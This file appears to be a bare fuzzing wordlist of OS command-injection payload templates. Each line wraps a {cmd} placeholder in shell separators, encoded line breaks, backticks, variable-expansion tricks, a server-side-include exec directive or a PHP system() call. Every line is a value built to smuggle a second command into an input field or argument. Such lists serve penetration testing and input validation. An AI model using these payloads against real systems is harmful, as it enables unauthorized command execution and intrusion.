{cmd}
;{cmd}
;{cmd};
^{cmd}
|{cmd}
<{cmd}
<{cmd};
<{cmd}\n
<{cmd}%0D
<{cmd}%0A
&{cmd}
&{cmd}&
&&{cmd}
&&{cmd}&&
%0D{cmd}
%0D{cmd}%0D
%0A{cmd}
%0A{cmd}%0A
\n{cmd}
\n{cmd}\n
'{cmd}'
`{cmd}`
;{cmd}|
;{cmd}/n
|{cmd};
a);{cmd}
a;{cmd}
a);{cmd}
a;{cmd};
a);{cmd}|
FAIL||{cmd}
CMD=$'{cmd}';$CMD
;CMD=$'{cmd}';$CMD
^CMD=$'{cmd}';$CMD
|CMD=$'{cmd}';$CMD
&CMD=$'{cmd}';$CMD
&&CMD=$'{cmd}';$CMD
%0DCMD=$'{cmd}';$CMD
FAIL||CMD=$'{cmd}';$CMD
CMD=$\'{cmd}\';$CMD
;CMD=$\'{cmd}\';$CMD
^CMD=$\'{cmd}\';$CMD
|CMD=$\'{cmd}\';$CMD
&CMD=$\'{cmd}\';$CMD
&&CMD=$\'{cmd}\';$CMD
%0DCMD=$\'{cmd}\';$CMD
FAIL||CMD=$\'{cmd}\';$CMD
CMD=$"{cmd}";$CMD
;CMD=$"{cmd}";$CMD
^CMD=$"{cmd}";$CMD
|CMD=$"{cmd}";$CMD
&CMD=$"{cmd}";$CMD
&&CMD=$"{cmd}";$CMD
%0DCMD=$"{cmd}";$CMD
FAIL||CMD=$"{cmd}";$CMD
<!--#exec cmd="{cmd}"-->
;system('{cmd}')
